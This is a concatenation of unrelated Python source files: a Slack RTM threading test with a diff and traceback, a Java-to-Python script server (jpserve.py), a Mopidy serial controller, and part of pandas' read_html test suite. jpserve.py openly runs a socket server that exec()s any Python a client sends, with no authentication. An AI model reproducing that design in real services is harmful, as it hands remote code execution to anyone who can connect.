def dynamic_import(self, name):
# Split path of the class folder structure:
# {sensor name}_sensor . {SensorName}Sensor
components = name.split('.')
# Dynamically import root of component path
module = __import__(components[0])
# Get component attributes
for component in components[1:]:
module = getattr(module, component)
return module
def decode_message_data(self, message):
if isinstance(message, dict):
# print('Dict Found')
return message
elif isinstance(message.decode('utf-8'), str):
try:
temp = json.loads(message.decode('utf-8'))
# print('Json Found')
return temp
except:
# print('Json Error. Str Found')
return {'event': 'Unknown', 'data': message}
else:
# print('Failed to detect type')
return {'event': 'Unknown', 'data': message}
|
test_issue_605.py
|
import collections
import logging
import os
import threading
import time
import unittest
import pytest
from integration_tests.env_variable_names import \
SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN, \
SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID
from integration_tests.helpers import is_not_specified
from slack import RTMClient, WebClient
class TestRTMClient(unittest.TestCase):
"""Runs integration tests with real Slack API
https://github.com/slackapi/python-slackclient/issues/605
"""
def setUp(self):
self.logger = logging.getLogger(__name__)
self.bot_token = os.environ[SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN]
self.channel_id = os.environ[SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID]
self.rtm_client = RTMClient(token=self.bot_token, run_async=False)
def tearDown(self):
# Reset the decorators by @RTMClient.run_on
RTMClient._callbacks = collections.defaultdict(list)
@pytest.mark.skipif(condition=is_not_specified(), reason="To avoid rate_limited errors")
def test_issue_605(self):
self.text = "This message was sent to verify issue #605"
self.called = False
@RTMClient.run_on(event="message")
def process_messages(**payload):
self.logger.info(payload)
self.called = True
def connect():
self.logger.debug("Starting RTM Client...")
self.rtm_client.start()
t = threading.Thread(target=connect)
t.setDaemon(True)
try:
t.start()
self.assertFalse(self.called)
time.sleep(3)
self.web_client = WebClient(
token=self.bot_token,
run_async=False,
)
new_message = self.web_client.chat_postMessage(channel=self.channel_id, text=self.text)
self.assertFalse("error" in new_message)
time.sleep(5)
self.assertTrue(self.called)
finally:
t.join(.3)
# --- a/slack/rtm/client.py
# +++ b/slack/rtm/client.py
# @@ -10,7 +10,6 @@ import inspect
# import signal
# from typing import Optional, Callable, DefaultDict
# from ssl import SSLContext
# -from threading import current_thread, main_thread
#
# # ThirdParty Imports
# import asyncio
# @@ -186,7 +185,8 @@ class RTMClient(object):
# SlackApiError: Unable to retrieve RTM URL from Slack.
# """
# # TODO: Add Windows support for graceful shutdowns.
# - if os.name != "nt" and current_thread() == main_thread():
# + # if os.name != "nt" and current_thread() == main_thread():
# + if os.name != "nt":
# signals = (signal.SIGHUP, signal.SIGTERM, signal.SIGINT)
# for s in signals:
# self._event_loop.add_signal_handler(s, self.stop)
# Exception in thread Thread-1:
# Traceback (most recent call last):
# File "/path-to-python/asyncio/unix_events.py", line 95, in add_signal_handler
# signal.set_wakeup_fd(self._csock.fileno())
# ValueError: set_wakeup_fd only works in main thread
#
# During handling of the above exception, another exception occurred:
#
# Traceback (most recent call last):
# File "/path-to-python/threading.py", line 932, in _bootstrap_inner
# self.run()
# File "/path-to-python/threading.py", line 870, in run
# self._target(*self._args, **self._kwargs)
# File "/path-to-project/python-slackclient/integration_tests/rtm/test_issue_605.py", line 29, in connect
# self.rtm_client.start()
# File "/path-to-project/python-slackclient/slack/rtm/client.py", line 192, in start
# self._event_loop.add_signal_handler(s, self.stop)
# File "/path-to-python/asyncio/unix_events.py", line 97, in add_signal_handler
# raise RuntimeError(str(exc))
# RuntimeError: set_wakeup_fd only works in main thread
|
jpserve.py
|
r"""JPServer is a Python script executor running on the Python side.
JPServe receiving and executing the script from 3rd-part languages,
then send back the result as JSON format to the caller.
Usages:
- Start server
server = JPServe(("hostname", port))
server.start()
- Stop server
server.shutdown()
- Set log level
server.setLogLevel(logging.DEBUG)
- The sample to make call from java side
import net.xdevelop.jpserve.PyClient
import net.xdevelop.jpserve.PyResult
String script = "a = 2\r\n" +
"b = 3\r\n" +
"_result_ = a * b\r\n";
PyClient client = PyClient.getInstance("localhost", "8888");
PyResult rs = client.exec(script);
// output the _result_ value calculated by Python
if (rs.getSuccess()) {
System.out.println(rs.getResult());
}
else {
System.out.println(rs.getMsg());
}
"""
from socketserver import StreamRequestHandler, ThreadingTCPServer, ForkingTCPServer
import logging
import os
import threading
import json
__all__ = ["JPServe"]
logger = logging.getLogger('JPServe')
class JPServe():
def __init__(self, server_address):
self.server_address = server_address
logging.basicConfig(level=logging.INFO)
logger.setLevel(logging.INFO)
def start(self):
logger.info("JPServe starting...")
if os.name == 'nt':
self.serv = PThreadingTCPServer(self.server_address, ServeHandler)
else:
self.serv = PForkingTCPServer(self.server_address, ServeHandler)
self.t = threading.Thread(target=self.serv.serve_forever)
self.t.start()
logger.info("JPServe listening in %s %s " % self.server_address)
def shutdown(self):
try:
self.serv.shutdown()
self.serv.server_close()
except Exception as e:
logger.error(e.getMessage())
logger.info("JPServe stopped.")
def setLogLevel(self, level):
logger.setLevel(level)
# Constant values for ServerHandler
BEGIN_MARK = b"#!{"
END_MARK = b"#!}"
CMD_EXIT = b"#!exit"
class ServeHandler(StreamRequestHandler):
r""" The handler to receive and exec the python script from 3rd-part side.
Client request syntax:
line0: #!{
line1-n: python script
linen+1: _result_ = the value return to caller
linen+2: #!}
Response to client:
line0: #!{
#!{
{
"result": _result_ value,
"success": true or false,
"msg": "success" or "error message"
}
#!}
Example:
Request:
#!{
a = 2 * 3
_result_= a
#!}
Response:
#!{
{
"result": 6,
"success": true,
"msg": "success"
}
#!}
"""
def handle(self):
self.request.setblocking(False)
while True:
if self.server.stopped:
break
try:
# read begin mark #!{
begin_mark = self.rfile.readline().strip()
if (begin_mark == CMD_EXIT): # end request
logger.info("Client (%s:%d) exit." % (self.client_address[0], self.client_address[1]))
break
if begin_mark != BEGIN_MARK:
continue
# read python script
script = ""
lines = []
while not self.server.stopped:
data = self.rfile.readline()
if data.strip() == END_MARK: # check end mark
break
elif len(data) > 0:
lines.append(data.decode("utf-8"))
script = "".join(lines)
logger.info("Received script from (%s:%d): \n%s" % (self.client_address[0], self.client_address[1], script))
except Exception as e:
logger.error("Read request failed: %s" % str(e))
break
if self.server.stopped:
break
# exec script
local_vars = {}
try:
local_vars["_result_"] = None
exec(compile(script, "<string>", "exec"), globals(), local_vars)
local_vars["_success_"] = True
local_vars["_msg_"] = "success"
except Exception as e:
logger.error("Exec script failed: %s" % str(e))
local_vars["_success_"] = False
local_vars["_msg_"] = "Execute script failed: %s" % str(e)
# response the result as JSON
try:
response = self.toJSON(local_vars)
logger.info("return: %s" % response.decode("utf-8"))
self.wfile.write("#!{\r\n".encode("utf-8"))
self.wfile.write(response)
self.wfile.write("\r\n#!}\r\n".encode("utf-8"))
except Exception as e:
logger.error("Sent result to client failed: %s" % str(e))
break
def toJSON(self, local_vars):
rs = {"success": local_vars["_success_"], "msg": local_vars["_msg_"], "result": json.dumps(local_vars["_result_"]) }
response = json.dumps(rs, indent=4)
response = bytes(response, "utf-8")
return response
class PThreadingTCPServer(ThreadingTCPServer):
def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
"""Constructor. May be extended, do not override."""
ThreadingTCPServer.__init__(self, server_address, RequestHandlerClass)
self.stopped = False
def shutdown(self):
self.stopped = True
ThreadingTCPServer.shutdown(self)
class PForkingTCPServer(ForkingTCPServer):
def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
"""Constructor. May be extended, do not override."""
ThreadingTCPServer.__init__(self, server_address, RequestHandlerClass)
self.stopped = False
def shutdown(self):
self.stopped = True
ForkingTCPServer.shutdown(self)
if __name__ == "__main__":
host = "localhost"
port = 8888
addr = (host, port)
jpserve = JPServe(addr)
jpserve.start()
|
smc.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import threading
import re
import logging
import serial
import pykka
from mopidy import exceptions
from mopidy.utils import encoding
logger = logging.getLogger(__name__)
class SerialMonoboxController(pykka.ThreadingActor):
def __init__(self, frontend, serial_port, serial_bps):
super(SerialMonoboxController, self).__init__()
try:
self.s = serial.Serial(serial_port, serial_bps, timeout=0.5)
except Exception as error:
raise exceptions.FrontendError('SMC serial connection failed: %s' %
encoding.locale_decode(error))
self.frontend = frontend
self.buffer = ''
def on_start(self):
self.s.flushInput()
thread = threading.Thread(target=self.thread_run)
thread.start()
def on_stop(self):
self.running = False
def thread_run(self):
self.running = True
while self.running:
ch = self.s.read()
if ch not in ('', '\r'):
self.buffer += ch
# logger.debug('SMC buf: %s' % str([c for c in self.buffer]))
while '\n' in self.buffer:
self.process_line(self.buffer[0:self.buffer.find('\n')])
self.buffer = self.buffer[self.buffer.find('\n') + 1:]
def process_parsed(self, typ, value):
if typ == 'P':
self.frontend.set_power_control(value)
elif typ == 'V':
self.frontend.set_volume(value)
elif typ == 'B' and value == 1:
self.frontend.next_button_pressed()
def process_line(self, line):
logger.debug('SMC process line: %s' % line)
res = re.search(r'^([BPV]):(\-?\d+)$', line)
if res:
typ, value = res.groups()
try:
value = int(value)
except ValueError:
logger.warning('Cannot decode value %s (line=%s)' % (value, line))
else:
self.process_parsed(typ, value)
|
test_html.py
|
from functools import partial
from importlib import reload
from io import (
BytesIO,
StringIO,
)
import os
from pathlib import Path
import re
import threading
from urllib.error import URLError
import numpy as np
import pytest
from pandas.compat import is_platform_windows
import pandas.util._test_decorators as td
from pandas import (
DataFrame,
MultiIndex,
Series,
Timestamp,
date_range,
read_csv,
to_datetime,
)
import pandas._testing as tm
from pandas.io.common import file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
HERE = os.path.dirname(__file__)
@pytest.fixture(
params=[
"chinese_utf-16.html",
"chinese_utf-32.html",
"chinese_utf-8.html",
"letz_latin1.html",
]
)
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath("io", "data", "html_encoding", request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
assert len(list1) == len(list2), (
"lists are not of equal size "
f"len(list1) == {len(list1)}, "
f"len(list2) == {len(list2)}"
)
msg = "not all list elements are DataFrames"
both_frames = all(
map(
lambda x, y: isinstance(x, DataFrame) and isinstance(y, DataFrame),
list1,
list2,
)
)
assert both_frames, msg
for frame_i, frame_j in zip(list1, list2):
tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
assert not frame_i.empty, "frames are both empty"
@td.skip_if_no("bs4")
@td.skip_if_no("html5lib")
def test_bs4_version_fails(monkeypatch, datapath):
import bs4
monkeypatch.setattr(bs4, "__version__", "4.2")
with pytest.raises(ImportError, match="Pandas requires version"):
read_html(datapath("io", "data", "html", "spam.html"), flavor="bs4")
def test_invalid_flavor():
url = "google.com"
flavor = "invalid flavor"
msg = r"\{" + flavor + r"\} is not a valid set of flavors"
with pytest.raises(ValueError, match=msg):
read_html(url, match="google", flavor=flavor)
@td.skip_if_no("bs4")
@td.skip_if_no("lxml")
@td.skip_if_no("html5lib")
def test_same_ordering(datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs_lxml = read_html(filename, index_col=0, flavor=["lxml"])
dfs_bs4 = read_html(filename, index_col=0, flavor=["bs4"])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize(
"flavor",
[
pytest.param("bs4", marks=[td.skip_if_no("bs4"), td.skip_if_no("html5lib")]),
pytest.param("lxml", marks=td.skip_if_no("lxml")),
],
scope="class",
)
class TestReadHtml:
@pytest.fixture(autouse=True)
def set_files(self, datapath):
self.spam_data = datapath("io", "data", "html", "spam.html")
self.spam_data_kwargs = {}
self.spam_data_kwargs["encoding"] = "UTF-8"
self.banklist_data = datapath("io", "data", "html", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor, request):
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
df = (
tm.makeCustomDataframe(
4,
3,
data_gen_f=lambda *args: np.random.rand(),
c_idx_names=False,
r_idx_names=False,
)
.applymap("{:.3f}".format)
.astype(float)
)
out = df.to_html()
res = self.read_html(out, attrs={"class": "dataframe"}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@tm.network
def test_banklist_url_positional_match(self):
url = "http://www.fdic.gov/resources/resolutions/bank-failures/failed-bank-list/index.html" # noqa E501
# Passing match argument as positional should cause a FutureWarning.
with tm.assert_produces_warning(FutureWarning):
df1 = self.read_html(
# lxml cannot find attrs leave out for now
url,
"First Federal Bank of Florida", # attrs={"class": "dataTable"}
)
with tm.assert_produces_warning(FutureWarning):
# lxml cannot find attrs leave out for now
df2 = self.read_html(
url,
"Metcalf Bank",
) # attrs={"class": "dataTable"})
assert_framelist_equal(df1, df2)
@tm.network
def test_banklist_url(self):
url = "http://www.fdic.gov/resources/resolutions/bank-failures/failed-bank-list/index.html" # noqa E501
df1 = self.read_html(
# lxml cannot find attrs leave out for now
url,
match="First Federal Bank of Florida", # attrs={"class": "dataTable"}
)
# lxml cannot find attrs leave out for now
df2 = self.read_html(
url,
match="Metcalf Bank",
) # attrs={"class": "dataTable"})
assert_framelist_equal(df1, df2)
@tm.network
def test_spam_url(self):
url = (
"https://raw.githubusercontent.com/pandas-dev/pandas/master/"
"pandas/tests/io/data/html/spam.html"
)
df1 = self.read_html(url, match=".*Water.*")
df2 = self.read_html(url, match="Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self):
df1 = self.read_html(
self.banklist_data, match=".*Florida.*", attrs={"id": "table"}
)
df2 = self.read_html(
self.banklist_data, match="Metcalf Bank", attrs={"id": "table"}
)
assert_framelist_equal(df1, df2)
def test_spam(self):
df1 = self.read_html(self.spam_data, match=".*Water.*")
df2 = self.read_html(self.spam_data, match="Unit")
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == "Proximates"
assert df1[0].columns[0] == "Nutrient"
def test_spam_no_match(self):
dfs = self.read_html(self.spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self):
dfs = self.read_html(self.banklist_data, attrs={"id": "table"})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self):
df = self.read_html(self.spam_data, match=".*Water.*", header=2)[0]
assert df.columns[0] == "Proximates"
assert not df.empty
def test_skiprows_int(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_range(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=range(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=range(2))
assert_framelist_equal(df1, df2)
def test_skiprows_list(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=[1, 2])
df2 = self.read_html(self.spam_data, match="Unit", skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows={1, 2})
df2 = self.read_html(self.spam_data, match="Unit", skiprows={2, 1})
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2, 5))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=np.arange(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows_invalid(self):
with pytest.raises(TypeError, match=("is not a valid type for skipping rows")):
self.read_html(self.spam_data, match=".*Water.*", skiprows="asdf")
def test_index(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_no_types(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_with_types(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_infer_types(self):
# 10892 infer_types removed
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_string_io(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data1 = StringIO(f.read())
with open(self.spam_data, **self.spam_data_kwargs) as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, match=".*Water.*")
df2 = self.read_html(data2, match="Unit")
assert_framelist_equal(df1, df2)
def test_string(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data = f.read()
df1 = self.read_html(data, match=".*Water.*")
df2 = self.read_html(data, match="Unit")
assert_framelist_equal(df1, df2)
def test_file_like(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
df1 = self.read_html(f, match=".*Water.*")
with open(self.spam_data, **self.spam_data_kwargs) as f:
df2 = self.read_html(f, match="Unit")
assert_framelist_equal(df1, df2)
@tm.network
def test_bad_url_protocol(self):
with pytest.raises(URLError, match="urlopen error unknown url type: git"):
self.read_html("git://github.com", match=".*Water.*")
@tm.network
@pytest.mark.slow
def test_invalid_url(self):
msg = (
"Name or service not known|Temporary failure in name resolution|"
"No tables found"
)
with pytest.raises((URLError, ValueError), match=msg):
self.read_html("http://www.a23950sdfa908sd.com", match=".*Water.*")
@pytest.mark.slow
def test_file_url(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)), match="First", attrs={"id": "table"}
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
@pytest.mark.slow
def test_invalid_table_attrs(self):
url = self.banklist_data
with pytest.raises(ValueError, match="No tables found"):
self.read_html(
url, match="First Federal Bank of Florida", attrs={"id": "tasdfable"}
)
def _bank_data(self, *args, **kwargs):
return self.read_html(
self.banklist_data, match="Metcalf", attrs={"id": "table"}, *args, **kwargs
)
@pytest.mark.slow
def test_multiindex_header(self):
df = self._bank_data(header=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_index(self):
df = self._bank_data(index_col=[0, 1])[0]
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows_tuples(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index_skiprows(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0]
assert isinstance(df.index, MultiIndex)
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_regex_idempotency(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)),
match=re.compile(re.compile("Florida")),
attrs={"id": "table"},
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
def test_negative_skiprows(self):
msg = r"\(you passed a negative value\)"
with pytest.raises(ValueError, match=msg):
self.read_html(self.spam_data, match="Water", skiprows=-1)
@tm.network
def test_multiple_matches(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
assert len(dfs) > 1
@tm.network
def test_python_docs_table(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
zz = [df.iloc[0, 0][0:4] for df in dfs]
assert sorted(zz) == sorted(["Repo", "What"])
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
html = """
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
"""
result = self.read_html(html)
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html(
"""<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data={"Header": "first"}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
"""
Ensure parser adds <tr> within <thead> on malformed HTML.
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(
data=[["Ukraine", "Odessa", 1944]],
columns=["Country", "Municipality", "Year"],
)
tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
"""
Make sure that read_html reads tfoot, containing td or th.
Ignores empty tfoot
"""
data_template = """<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>"""
expected1 = DataFrame(data=[["bodyA", "bodyB"]], columns=["A", "B"])
expected2 = DataFrame(
data=[["bodyA", "bodyB"], ["footA", "footB"]], columns=["A", "B"]
)
data1 = data_template.format(footer="")
data2 = data_template.format(footer="<tr><td>footA</td><th>footB</th></tr>")
result1 = self.read_html(data1)[0]
result2 = self.read_html(data2)[0]
tm.assert_frame_equal(result1, expected1)
tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
# GH5048: if header is specified explicitly, an int column should be
# parsed as int while its header is parsed as str
result = self.read_html(
"""
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame([["text", 1944]], columns=("S", "I"))
tm.assert_frame_equal(result, expected)
@pytest.mark.slow
def test_banklist_header(self, datapath):
from pandas.io.html import _remove_whitespace
def try_remove_ws(x):
try:
return _remove_whitespace(x)
except AttributeError:
return x
df = self.read_html(self.banklist_data, match="Metcalf", attrs={"id": "table"})[
0
]
ground_truth = read_csv(
datapath("io", "data", "csv", "banklist.csv"),
converters={"Updated Date": Timestamp, "Closing Date": Timestamp},
)
assert df.shape == ground_truth.shape
old = [
"First Vietnamese American BankIn Vietnamese",
"Westernbank Puerto RicoEn Espanol",
"R-G Premier Bank of Puerto RicoEn Espanol",
"EurobankEn Espanol",
"Sanderson State BankEn Espanol",
"Washington Mutual Bank(Including its subsidiary Washington "
"Mutual Bank FSB)",
"Silver State BankEn Espanol",
"AmTrade International BankEn Espanol",
"Hamilton Bank, NAEn Espanol",
"The Citizens Savings BankPioneer Community Bank, Inc.",
]
new = [
"First Vietnamese American Bank",
"Westernbank Puerto Rico",
"R-G Premier Bank of Puerto Rico",
"Eurobank",
"Sanderson State Bank",
"Washington Mutual Bank",
"Silver State Bank",
"AmTrade International Bank",
"Hamilton Bank, NA",
"The Citizens Savings Bank",
]
dfnew = df.applymap(try_remove_ws).replace(old, new)
gtnew = ground_truth.applymap(try_remove_ws)
converted = dfnew._convert(datetime=True, numeric=True)
date_cols = ["Closing Date", "Updated Date"]
converted[date_cols] = converted[date_cols].apply(to_datetime)
tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self):
gc = "Gold Canyon"
with open(self.banklist_data) as f:
raw_text = f.read()
assert gc in raw_text
df = self.read_html(
self.banklist_data, match="Gold Canyon", attrs={"id": "table"}
)[0]
assert gc in df.to_string()
def test_different_number_of_cols(self):
expected = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
result = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
"""
)[0]
expected = DataFrame([["a", "b", "c"]], columns=["A", "B", "C"])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# X x Y Z W
# A B b z C
result = self.read_html(
"""
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "Z", "C"]], columns=["X", "X.1", "Y", "Z", "W"]
)
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_both_not_1(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B b b C
# a b b b D
result = self.read_html(
"""
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "B", "D"]], columns=["A", "B", "B.1", "B.2", "C"]
)
tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B
# C b
result = self.read_html(
"""
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["C", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["A", "B"], ["A", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
df = DataFrame({"date": date_range("1/1/2001", periods=10)})
expected = df.to_html()
res = self.read_html(expected, parse_dates=[1], index_col=0)
tm.assert_frame_equal(df, res[0])
res = self.read_html(expected, parse_dates=["date"], index_col=0)
tm.assert_frame_equal(df, res[0])
def test_parse_dates_combine(self):
raw_dates = Series(date_range("1/1/2001", periods=10))
df = DataFrame(
{
"date": raw_dates.map(lambda x: str(x.date())),
"time": raw_dates.map(lambda x: str(x.time())),
}
)
res = self.read_html(
df.to_html(), parse_dates={"datetime": [1, 2]}, index_col=1
)
newdf = DataFrame({"datetime": raw_dates})
tm.assert_frame_equal(newdf, res[0])
def test_wikipedia_states_table(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
assert os.path.isfile(data), f"{repr(data)} is not a file"
assert os.path.getsize(data), f"{repr(data)} is an empty file"
result = self.read_html(data, match="Arizona", header=1)[0]
assert result.shape == (60, 12)
assert "Unnamed" in result.columns[-1]
assert result["sq mi"].dtype == np.dtype("float64")
assert np.allclose(result.loc[0, "sq mi"], 665384.04)
def test_wikipedia_states_multiindex(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
result = self.read_html(data, match="Arizona", index_col=0)[0]
assert result.shape == (60, 11)
assert "Unnamed" in result.columns[-1][1]
assert result.columns.nlevels == 2
assert np.allclose(result.loc["Alaska", ("Total area[2]", "sq mi")], 665384.04)
def test_parser_error_on_empty_header_row(self):
result = self.read_html(
"""
<table>
